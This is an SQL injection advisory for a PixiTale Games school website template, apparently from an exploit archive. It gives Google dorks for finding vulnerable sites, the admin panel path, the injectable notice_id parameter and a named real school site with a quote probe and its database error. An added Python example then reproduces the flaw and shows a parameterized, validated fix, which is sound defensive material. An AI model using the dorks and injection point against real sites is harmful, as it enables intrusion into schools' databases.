
By Prodigy PixiTale Games Bangladesh Education SQL Injection Vulnerability

Author: KingSkrupellos , Published: 11-01-2019
# Exploit Title : By Prodigy PixiTale Games Bangladesh Education SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 08/01/2019
# Vendor Homepage : pixitale.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Designed by PIXITALE GAMES.'' site:edu.bd
#                intext:''By Prodigy. Copyright © PIXITALE GAMES''
#                intext:''Copyright © 2017 PIXITALE GAMES. Designed by PIXITALE GAMES. All rights reserved.''
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

############################################################

# Admin Panel Login Path :
**************************

/admin/

# SQL Injection Exploit :
**************************

/notice.php?notice_id=[SQL Injection]

############################################################

# Example Vulnerable Site =>
**************************

Note => (192.185.171.2) => There are 46 domains hosted on this server.

[+] sjs.edu.bd/notice.php?notice_id=439%27

=> [ Proof of Concept ] => archive.fo/ePLlF

############################################################

# SQL Database Error :
********************

Last query: SELECT * FROM notice WHERE id='439''
Mysql error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''439''' at line 1
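The error above shows the root cause: the `notice_id` parameter is pasted straight into the SQL text, so a single stray quote changes the statement. The following is an added example, not the vendor's code and not part of the original advisory. It uses Python with an in-memory SQLite database as a stand-in for the site's PHP/MySQL stack; the `notice` table name and `id` column come from the quoted error message, while the `title` column and the sample rows are constructed for the example. It reproduces the broken query pattern beside the fix a maintainer would apply: allow-list validation of the numeric id followed by a parameterized query.

```python
import re
import sqlite3


def make_db():
    # Constructed stand-in for the site's `notice` table. The table and `id`
    # column names are taken from the advisory's error text; `title` and the
    # two rows are invented for this example.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE notice (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO notice (id, title) VALUES (?, ?)",
        [(438, "Holiday schedule"), (439, "Exam routine")],
    )
    conn.commit()
    return conn


def vulnerable_lookup(conn, notice_id):
    # Mirrors the pattern the error message reveals: the raw request value is
    # spliced into the SQL string, so a quote in the input breaks the statement.
    query = "SELECT * FROM notice WHERE id='" + notice_id + "'"
    return conn.execute(query).fetchone()


def validate_notice_id(raw):
    # Allow-list check: a notice id is a numeric key, so anything other than
    # a short run of digits is rejected before it gets near the database.
    if re.fullmatch(r"[0-9]{1,10}", raw or ""):
        return int(raw)
    return None


def safe_lookup(conn, raw):
    # Hardened form: validate first, then bind the value as a parameter.
    # The driver sends the value separately from the SQL text, so it can
    # never alter the statement's structure.
    nid = validate_notice_id(raw)
    if nid is None:
        return None
    return conn.execute(
        "SELECT id, title FROM notice WHERE id=?", (nid,)
    ).fetchone()


def reproduce_error(conn, raw):
    """Run the vulnerable path and return the driver's error text, or None if it ran cleanly."""
    try:
        vulnerable_lookup(conn, raw)
        return None
    except sqlite3.OperationalError as exc:
        return str(exc)


if __name__ == "__main__":
    db = make_db()
    # The same trailing-quote input the advisory shows: the concatenated
    # query fails with a syntax error, the hardened path simply rejects it.
    print("vulnerable:", reproduce_error(db, "439'"))
    print("hardened:  ", safe_lookup(db, "439'"))
    print("hardened:  ", safe_lookup(db, "439"))
```

The validation step is what a request log or WAF rule would also key on: a `notice_id` that is anything but digits is malformed for this endpoint, so rejecting it early both closes the injection and gives a clean signal to alert on. The parameterized query is the actual fix; validation alone is a defence-in-depth layer, not a substitute for it.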

############################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
